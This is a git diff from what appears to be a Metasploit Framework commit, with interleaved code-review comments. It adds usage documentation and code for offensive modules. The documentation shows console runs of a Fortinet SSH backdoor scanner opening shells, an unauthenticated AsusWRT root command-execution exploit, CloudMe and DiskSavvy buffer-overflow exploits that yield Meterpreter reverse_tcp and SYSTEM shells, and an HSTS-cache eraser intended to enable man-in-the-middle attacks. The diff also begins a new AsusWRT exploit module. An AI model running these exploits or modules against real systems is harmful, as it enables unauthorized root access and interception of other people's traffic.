diff --git a/Gemfile.lock b/Gemfile.lock index 4e5e66856a..0d502baa64 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -59,7 +59,7 @@ PATH rex-text rex-zip ruby-macho - ruby_smb + ruby_smb (= 0.0.18) rubyntlm rubyzip sqlite3 @@ -125,11 +125,11 @@ GEM railties (>= 3.0.0) faker (1.8.7) i18n (>= 0.7) - faraday (0.13.1) + faraday (0.14.0) multipart-post (>= 1.2, < 3) filesize (0.1.1) fivemat (1.3.5) - google-protobuf (3.5.1) + google-protobuf (3.5.1.2) googleapis-common-protos-types (1.0.1) google-protobuf (~> 3.0) googleauth (0.6.2) @@ -140,12 +140,12 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.8.3) + grpc (1.9.1) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) - i18n (0.9.1) + i18n (0.9.5) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix @@ -155,7 +155,7 @@ GEM logging (2.2.2) little-plugger (~> 1.1) multi_json (~> 1.10) - loofah (2.1.1) + loofah (2.2.0) crass (~> 1.0.2) nokogiri (>= 1.5.9) memoist (0.16.0) @@ -167,7 +167,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-credential (2.0.12) + metasploit-credential (2.0.13) metasploit-concern metasploit-model metasploit_data_models @@ -194,7 +194,7 @@ GEM metasploit_payloads-mettle (0.3.7) method_source (0.9.0) mini_portile2 (2.3.0) - minitest (5.11.1) + minitest (5.11.3) mqtt (0.5.0) msgpack (1.2.2) multi_json (1.13.1) @@ -203,7 +203,7 @@ GEM net-ssh (4.2.0) network_interface (0.0.2) nexpose (7.2.0) - nokogiri (1.8.1) + nokogiri (1.8.2) mini_portile2 (~> 2.3.0) octokit (4.8.0) sawyer (~> 0.8.0, >= 0.5.3) @@ -214,7 +214,7 @@ GEM pcaprub patch_finder (1.0.2) pcaprub (0.12.4) - pdf-reader (2.0.0) + pdf-reader (2.1.0) Ascii85 (~> 1.0.0) afm (~> 0.2.1) hashery (~> 2.0) @@ -229,7 +229,7 @@ GEM pry (0.11.3) coderay (~> 1.1.0) method_source (~> 0.9.0) - public_suffix (3.0.1) + public_suffix (3.0.2) rack (1.6.8) rack-test (0.6.3) rack (>= 1.0) 
@@ -320,7 +320,7 @@ GEM rspec-support (~> 3.7.0) rspec-rerun (1.1.0) rspec (~> 3.0) - rspec-support (3.7.0) + rspec-support (3.7.1) ruby-macho (1.1.0) ruby-rc4 (0.1.5) ruby_smb (0.0.18) @@ -348,7 +348,7 @@ GEM thread_safe (0.3.6) timecop (0.9.1) ttfunk (1.5.1) - tzinfo (1.2.4) + tzinfo (1.2.5) thread_safe (~> 0.1) tzinfo-data (1.2018.3) tzinfo (>= 1.0.0) diff --git a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md new file mode 100644 index 0000000000..c1738306e8 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md 
@@ -0,0 +1,63 @@ +## Intro + +This module scans for the Fortinet SSH backdoor and creates sessions. + +## Setup + +1. `git clone https://github.com/nixawk/labs` +2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware +3. + +## Usage + +``` +msf5 > use auxiliary/scanner/ssh/fortinet_backdoor +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24 +rhosts => 192.168.212.0/24 +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100 +threads => 100 +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run + +[*] Scanned 54 of 256 hosts (21% complete) +[+] 192.168.212.128:22 - Logged in as Fortimanager_Access +[*] Scanned 65 of 256 hosts (25% complete) +[*] Scanned 78 of 256 hosts (30% complete) +[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600 +[*] Scanned 104 of 256 hosts (40% complete) +[*] Scanned 141 of 256 hosts (55% complete) +[*] Scanned 154 of 256 hosts (60% complete) +[*] Scanned 180 of 256 hosts (70% complete) +[*] Scanned 205 of 256 hosts (80% complete) +[*] Scanned 240 of 256 hosts (93% complete) +[*] Scanned 256 of 256 hosts (100% complete) +[*] Auxiliary module execution completed +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1 +[*] Starting interaction with 1... 
+ +FortiGate-VM # get system status +Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4) +Virus-DB: 16.00560(2012-10-19 08:31) +Extended DB: 1.00000(2012-10-17 15:46) +Extreme DB: 1.00000(2012-10-17 15:47) +IPS-DB: 4.00345(2013-05-23 00:39) +IPS-ETDB: 0.00000(2000-00-00 00:00) +Serial-Number: FGVM00UNLICENSED +Botnet DB: 1.00000(2012-05-28 22:51) +License Status: Evaluation license expired +Evaluation License Expires: Thu Jan 28 13:05:41 2016 +BIOS version: 04000002 +Log hard disk: Need format +Hostname: FortiGate-VM +Operation Mode: NAT +Current virtual domain: root +Max number of virtual domains: 10 +Virtual domains status: 1 in NAT mode, 0 in TP mode +Virtual domain configuration: disable +FIPS-CC mode: disable +Current HA mode: standalone +Branch point: 228 +Release Version Information: GA Patch 4 +System time: Wed Feb 21 13:13:43 2018 + +FortiGate-VM # +``` diff --git a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md new file mode 100644 index 0000000000..914f862489 --- /dev/null +++ b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md 
@@ -0,0 +1,70 @@ +## Description + + This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`. + + +## Vulnerable Application + + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode. + + This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user. + + This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743. + + Numerous ASUS models are reportedly affected, but untested. + + +## Verification Steps + + 1. Start `msfconsole` + 2. `use exploits/linux/http/asuswrt_lan_rce` + 3. `set RHOST [IP]` + 4. `run` + 5. You should get a *root* session + + +## Options + + **ASUSWRTPORT** + + AsusWRT HTTP portal port (default: `80`) + + +## Scenarios +msf > use exploit/linux/http/asuswrt_lan_rce +msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 +rhost => 192.168.132.205 +msf exploit(linux/http/asuswrt_lan_rce) > run + +[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. +[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 +[+] 192.168.132.205:9999 - Success, shell incoming! +[*] Found shell. 
+[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600 + +id +id +/bin/sh: id: not found +/ # cat /proc/cpuinfo +cat /proc/cpuinfo +system type : Broadcom BCM53572 chip rev 1 pkg 8 +processor : 0 +cpu model : MIPS 74K V4.9 +BogoMIPS : 149.91 +wait instruction : no +microsecond timers : yes +tlb_entries : 32 +extra interrupt vector : no +hardware watchpoint : yes +ASEs implemented : mips16 dsp +shadow register sets : 1 +VCED exceptions : not available +VCEI exceptions : not available + +unaligned_instructions : 0 +dcache hits : 2147483648 +dcache misses : 0 +icache hits : 2147483648 +icache misses : 0 +instructions : 2147483648 +/ # diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md new file mode 100644 index 0000000000..dad36f3df3 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md 
@@ -0,0 +1,41 @@ +## Description +This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe). + +## Verification Steps + 1. Install CloudMe for Desktop version `v1.10.9` + 2. Start the applicaton (you don't need to create an account) + 3. Start `msfconsole` + 4. Do `use exploit/windows/misc/cloudme_sync` + 5. Do `set RHOST ip` + 6. Do `set LHOST ip` + 7. Do `exploit` + 8. Verify the Meterpreter session is opened + +## Scenarios + +### CloudMe Sync client application on Windows 7 SP1 x86 + +``` +msf > use exploit/windows/misc/cloudme_sync +msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148 +RHOST => 172.16.40.148 +msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 +LHOST => 172.16.40.5 +msf exploit(windows/misc/cloudme_sync) > exploit + +[*] Started reverse TCP handler on 172.16.40.5:4444 +[*] Sending stage (179779 bytes) to 172.16.40.148 +[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000 + +meterpreter > sysinfo +Computer : PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : pt_PT +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md new file mode 100644 index 0000000000..056f7bdd15 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md 
@@ -0,0 +1,39 @@ +## Vulnerable Application + +[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe). + +## Verification Steps + 1. Install a vulnerable DiskSavvy Enterprise + 2. Start `msfconsole` + 3. Do `use exploit/windows/misc/disk_savvy_adm` + 4. Do `set RHOST ip` + 5. Do `set PAYLOAD windows/shell/bind_tcp` + 6. Do `exploit` + 7. Enjoy your shell + +## Scenarios + +### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 + +``` +msf > use exploit/windows/misc/disk_savvy_adm +msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55 +RHOST => 192.168.216.55 +msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp +payload => windows/shell/bind_tcp +msf exploit(windows/misc/disk_savvy_adm) > exploit + +[*] Started bind handler +[*] Encoded stage with x86/shikata_ga_nai +[*] Sending encoded stage (267 bytes) to 192.168.216.55 +[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500 + +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32>whoami +whoami +nt authority\system + +C:\Windows\system32> +``` diff --git a/documentation/modules/post/multi/manage/hsts_eraser.md b/documentation/modules/post/multi/manage/hsts_eraser.md new file mode 100644 index 0000000000..b55a080344 --- /dev/null +++ b/documentation/modules/post/multi/manage/hsts_eraser.md 
@@ -0,0 +1,62 @@ +This module allows you to erase the [HTTP Strict-Transport-Security](https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security) cache of a target machine. When combined with a sniffer or a man-in-the-middle tool, this module will assist with the capture/modification of TLS-encrypted traffic. + +**WARNING:** This module _erases_ the HSTS cache, leaving the target in a vulnerable state. All browser traffic from all users on the target will be subject to man-in-the-middle attacks. There is no undo built-into this module. If you intend to revert, you must first backup the HSTS file before running the module. + +Note: This module searches for all non-root users on the system. It will not erase HSTS data for the root user. + +## Vulnerable Application + +The following platforms are supported: +* Windows +* Linux +* OS X + +## Verification Steps + +1. Obtain and background a session from the target machine. +2. From the `msf>` prompt, do ```use post/multi/manage/hsts_eraser``` +3. Set the ```DISCLAIMER``` option to ```True``` (after reading the above **WARNING**) +4. Set the ```SESSION``` option +5. ```run``` + +Alternatively: + +1. Obtain a session from the target machine. +2. From the `meterpreter>` prompt, do ```run post/multi/manage/hsts_eraser DISCLAIMER=True``` + +## Demo + +Set up a Kali VM with some HSTS data: + +```bash +root@kali-2017:~# adduser bob +root@kali-2017:~# su bob +bob@kali-2017:/root$ cd + +bob@kali-2017:~$ wget -S https://outlook.live.com/owa/ 2>&1 | grep -i strict + Strict-Transport-Security: max-age=31536000; includeSubDomains + Strict-Transport-Security: max-age=31536000; includeSubDomains +bob@kali-2017:~$ cat .wget-hsts +# HSTS 1.0 Known Hosts database for GNU Wget. +# Edit at your own risk. +# +outlook.live.com 0 1 1519176414 31536000 +``` + +Create an `msfvenom` payload, execute it, and then connect to it with `multi/exploit/handler`. 
From the Meterpreter session on the victim: + +``` +[*] Meterpreter session 1 opened (127.0.0.1:38089 -> 127.0.0.1:44444) at 2018-02-20 19:19:02 -0600 + +meterpreter > run post/multi/manage/hsts_eraser DISCLAIMER=True + +[*] Removing wget HSTS database for bob... +[*] HSTS databases removed! Now enjoy your favorite sniffer! ;-) +``` + +Confirm that the file was deleted: + +```bash +bob@kali-2017:~$ cat .wget-hsts +cat: .wget-hsts: No such file or directory +``` diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb index 9b8aae1f9c..6072eccbff 100644 --- a/lib/msf/core/exploit/fortinet.rb +++ b/lib/msf/core/exploit/fortinet.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- +# https://www.ietf.org/rfc/rfc4252.txt # https://www.ietf.org/rfc/rfc4256.txt require 'net/ssh' @@ -11,21 +12,21 @@ module Msf::Exploit::Remote::Fortinet USERAUTH_INFO_RESPONSE = 61 def authenticate(service_name, username = 'Fortimanager_Access', password = nil) - debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' } send_message(userauth_request( =begin - string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) - string service name (US-ASCII) - string "keyboard-interactive" (US-ASCII) - string language tag (as defined in [RFC-3066]) - string submethods (ISO-10646 UTF-8) + string user name + string service name + string "password" + boolean FALSE + string plaintext password in ISO-10646 UTF-8 encoding [RFC3629] =end username, service_name, - 'keyboard-interactive', - '', - '' + 'password', + false, + password || '' )) loop do 
@@ -37,7 +38,22 @@ module Msf::Exploit::Remote::Fortinet return true when USERAUTH_FAILURE debug { 'Received SSH_MSG_USERAUTH_FAILURE' } - return false + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' } + + send_message(userauth_request( +=begin + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) + string language tag (as defined in [RFC-3066]) + string submethods (ISO-10646 UTF-8) +=end + username, + service_name, + 'keyboard-interactive', + '', + '' + )) when USERAUTH_INFO_REQUEST debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 56b6781b23..6470effe0e 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py @@ -29,7 +29,7 @@ def report_vuln(ip, name, **opts): def run(metadata, module_callback): - req = json.loads(os.read(0, 10000)) + req = json.loads(os.read(0, 10000).decode("utf-8")) if req['method'] == 'describe': rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': diff --git a/lib/net/ssh/command_stream.rb b/lib/net/ssh/command_stream.rb index f9d82cd518..11ef475d28 100644 --- a/lib/net/ssh/command_stream.rb +++ b/lib/net/ssh/command_stream.rb 
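Review bot: The USERAUTH_FAILURE arm now re-sends a keyboard-interactive request on every failure, so a server that rejects that method too replies with another USERAUTH_FAILURE and the `loop do` never terminates — the old `return false` was the only exit on this path. The fallback needs a one-shot flag: `return false if tried_kbdint` ahead of the `debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }` line, `tried_kbdint = true` right after the `send_message(...)` call, and `tried_kbdint = false` initialised at the top of `authenticate` (which begins in the previous hunk). A short comment such as `# password first, then one keyboard-interactive attempt; never retry a failed method` would make the intended sequence explicit. The enclosing `authenticate` method and its `loop do` start and end outside this hunk, so the remaining `when` arms are not visible here.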
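Review bot: `os.read(0, 10000)` is a single read, so a request that arrives over the pipe in more than one chunk, or that exceeds 10000 bytes, reaches `json.loads` truncated and fails with a decode error; the new `.decode("utf-8")` fixes the bytes/str mismatch but leaves that limit in place. If the framework sends exactly one request and closes stdin, `req = json.loads(sys.stdin.buffer.read().decode("utf-8"))` (with `import sys`, if the file does not already have it) removes the limit; if stdin stays open for further requests, a delimited or length-prefixed read loop is needed instead — I cannot tell which from this hunk. The `run` function continues past the hunk.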
@@ -15,7 +15,34 @@ class CommandStream attr_accessor :localinfo end - def initialize(ssh, cmd, cleanup = false) + def shell_requested(channel, success) + raise "could not request ssh shell" unless success + channel[:data] = '' + + channel.on_eof do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_close do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_data do |ch,data| + self.rsock.write(data) + end + + channel.on_extended_data do |ch, ctype, data| + self.rsock.write(data) + end + + self.channel = channel + end + + def initialize(ssh, cmd = nil, cleanup = true) self.lsock, self.rsock = Rex::Socket.tcp_socket_pair() self.lsock.extend(Rex::IO::Stream) @@ -23,7 +50,7 @@ class CommandStream self.rsock.extend(Rex::IO::Stream) self.ssh = ssh - self.thread = Thread.new(ssh,cmd,cleanup) do |rssh,rcmd,rcleanup| + self.thread = Thread.new(ssh,cmd,cleanup) do |rssh, rcmd, rcleanup| begin info = rssh.transport.socket.getpeername_as_array @@ -33,32 +60,10 @@ class CommandStream self.lsock.localinfo = "#{info[1]}:#{info[2]}" rssh.open_channel do |rch| - rch.exec(rcmd) do |c, success| - raise "could not execute command: #{rcmd.inspect}" unless success - - c[:data] = '' - - c.on_eof do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_close do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_data do |ch,data| - self.rsock.write(data) - end - - c.on_extended_data do |ch, ctype, data| - self.rsock.write(data) - end - - self.channel = c + if cmd.nil? + rch.send_channel_request("shell", &method(:shell_requested)) + else + rch.exec(rsh, &method(:shell_requested)) end end @@ -85,7 +90,7 @@ class CommandStream end # Shut down the SSH session if requested - if(rcleanup) + if rcleanup rssh.close end end 
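Review bot: `shell_requested` now serves as the callback for both the `shell` channel request and `exec`, but its failure message `"could not request ssh shell"` drops the command that the old `exec` callback reported (`"could not execute command: #{rcmd.inspect}"`), so a failed `exec` later in the file is indistinguishable from a failed shell request. At minimum the wording should not claim a shell was asked for, e.g. `raise "could not open ssh shell/exec channel" unless success`, and a header comment stating that this method is the net-ssh channel callback (`# net-ssh callback for both `shell` and `exec` channel requests; wires the channel to rsock`) would help, since the name alone does not say so. It is also a callback with no external users in this file, so it belongs under `private` if the class has such a section.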
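Review bot: `rch.exec(rsh, &method(:shell_requested))` references `rsh`, which is not defined anywhere in the method — the thread block's parameters are `rssh, rcmd, rcleanup` — so every caller that still passes a command (`quantum_vmpro_backdoor.rb` with `'shell-escape'` and `array_vxag_vapv_privkey_privesc.rb` with `build_command`, both updated in this same commit) will raise NameError inside the session thread instead of running the command. The line should read `rch.exec(rcmd, &method(:shell_requested))`, and the `if cmd.nil?` guard just above it should test the thread-local `rcmd` for the same reason (`if rcmd.nil?`) rather than closing over the constructor argument. Because the error is raised inside the thread, `initialize` returns normally and the failure only shows up when the thread dies, which is why a test exercising a non-nil `cmd` would not have caught this at construction time. The enclosing `initialize` starts and ends outside this hunk.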
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 6ab2274e03..4837f25845 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -127,7 +127,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'mqtt' spec.add_runtime_dependency 'net-ssh' spec.add_runtime_dependency 'bcrypt_pbkdf' - spec.add_runtime_dependency 'ruby_smb' + spec.add_runtime_dependency 'ruby_smb', '0.0.18' # # REX Libraries diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index fbe018977d..6873c06844 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary finger_zero finger_dot finger_chars - vprint_status "#{rhost}:#{rport} - Sending finger request for user list: #{finger_user_common.join(", ")}" + vprint_status "#{rhost}:#{rport} - Sending finger request for #{finger_user_common.count} users" finger_list rescue ::Rex::ConnectionError @@ -168,22 +168,21 @@ class MetasploitModule < Msf::Auxiliary # No such file or directory == valid user bad utmp - # Solaris - if(line =~ /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/) + + case line + when /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/ + # Solaris uid = $1 if ($2 != "Name") @users[uid] ||= {} end - end - # IRIX - if(line =~ /^\s*Login name:\s*([^\s]+)\s+/i) + when /^\s*Login name:\s*([^\s]+)\s+/i + # IRIX uid = $1 @users[uid] ||= {} if uid - end - - # Debian GNU/Linux - if(line =~ /^\s*Username:\s*([^\s]+)\s+/i) + when /^\s*(?:Username|Login):\s*([^\s]+)\s+/i + # Debian GNU/Linux uid = $1 @users[uid] ||= {} if uid end diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index aa41da8017..9c335006d4 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb 
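Review bot: Turning the three independent `if line =~` tests in `finger_users.rb` into a single `case line` changes the matching: `case` stops at the first `when` that matches, whereas the old code applied all three regexes to every line. The generic Solaris pattern `/^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/` is listed first and can claim a row intended for the new case-insensitive `(?:Username|Login):` arm — a lowercase `login: name ...` line with enough fields would set `uid` to the word `login` rather than the user. If first-match is intended, order the two labelled arms (`Login name:` and `Username|Login:`) before the Solaris one so they are not shadowed, and say so in a comment (`# most specific formats first; case stops at the first match`); otherwise keep separate `if`s. The method this hunk sits in begins and ends outside the hunk.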
@@ -232,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary # No password change required moving on. # Check for valid login but no mailbox setup print_good("server type: #{res.headers["X-FEServer"]}") - if res.headers['location'] =~ /owa/ + if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/ print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'") report_cred( ip: res.peerinfo['addr'], diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index e06d3100f5..70e83503f2 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,10 +3,14 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +# XXX: This shouldn't be necessary but is now +require 'net/ssh/command_stream' + class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner + include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Report def initialize(info = {}) @@ -45,6 +49,8 @@ class MetasploitModule < Msf::Auxiliary ssh_opts = { port: rport, + # The auth method is converted into a class name for instantiation, + # so fortinet-backdoor here becomes FortinetBackdoor from the mixin auth_methods: ['fortinet-backdoor'], non_interactive: true, config: false, 
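Review bot: The new condition in `owa_login.rb` uses `and`, whose low precedence makes it behave differently from `&&` as soon as the expression is assigned or combined with other operators, and the style guide reserves it for control flow; write `if res.headers['location'] =~ /owa/ && res.headers['location'] !~ /reason/`. The header is also read twice, so `location = res.headers['location']` on the line before keeps the condition short (keep `=~`/`!~` rather than `match?`, since a missing header yields `nil` and `nil =~` is still defined). The commit does not say which redirect carries `reason`; a one-line comment naming the OWA response it excludes would save the next reader from guessing. The enclosing block starts outside the hunk.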
@@ -63,15 +69,33 @@ class MetasploitModule < Msf::Auxiliary return end - if ssh - print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") - report_vuln( - host: ip, - name: self.name, - refs: self.references, - info: ssh.transport.server_version.version - ) - end + return unless ssh + + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + + version = ssh.transport.server_version.version + + report_vuln( + host: ip, + name: self.name, + refs: self.references, + info: version + ) + + shell = Net::SSH::CommandStream.new(ssh) + + return unless shell + + info = "Fortinet SSH Backdoor (#{version})" + + ds_merge = { + 'USERNAME' => 'Fortimanager_Access' + } + + start_session(self, info, ds_merge, false, shell.lsock) + + # XXX: Ruby segfaults if we don't remove the SSH socket + remove_socket(ssh.transport.socket) end def rport diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index b495195fb5..79d5b38083 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) merge_me = { 'USERPASS_FILE' => nil, diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index f0b271e46a..703e8b9094 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session from the socket - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) # Clean up the stored data - need to stash the keyfile into # a datastore for later reuse. 
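Review bot: `return unless shell` in `fortinet_backdoor.rb` can never trigger: `Net::SSH::CommandStream.new` returns the instance or raises, and under the accompanying `command_stream.rb` change a refused shell request raises inside the stream's own thread, so nothing on this path reports it to the caller. Drop the dead guard; if a failed shell request should be surfaced here, that has to come from the CommandStream side, which this hunk cannot observe. The `# XXX: Ruby segfaults if we don't remove the SSH socket` comment would be more useful with the Ruby/net-ssh versions it was observed on, so it can be retired when no longer needed. The method containing this hunk starts outside it.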
diff --git a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py index 0dfa7558d9..4b5bab7f6b 100755 --- a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py +++ b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py @@ -9,9 +9,13 @@ import os import ssl # extra modules -import gmpy2 -from cryptography import x509 -from cryptography.hazmat.backends import default_backend +dependencies_missing = False +try: + import gmpy2 + from cryptography import x509 + from cryptography.hazmat.backends import default_backend +except ImportError: + dependencies_missing = True from metasploit import module @@ -151,6 +155,10 @@ def oracle(target, pms, cke_2nd_prefix, cipher_handshake=ch_def, messageflow=Fal def run(args): + if dependencies_missing: + module.log("Module dependencies (gmpy2 and cryptography python libraries) missing, cannot continue", level='error') + return + target = (args['rhost'], int(args['rport'])) timeout = float(args['timeout']) cipher_handshake = cipher_handshakes[args['cipher_group']] diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 781db9a106..e0ac301d69 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb new file mode 100644 index 0000000000..66440322dc --- /dev/null +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb 
@@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', + 'Description' => %q{ + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to + perform a POST in certain cases. This can be combined with another vulnerability in + the VPN configuration upload routine that sets NVRAM configuration variables directly + from the POST request to enable a special command mode. + This command mode can then be abused by sending a UDP packet to infosvr, which is running + on port UDP 9999 to directly execute commands as root. + This exploit leverages that to start telnetd in a random port, and then connects to it. + It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. 
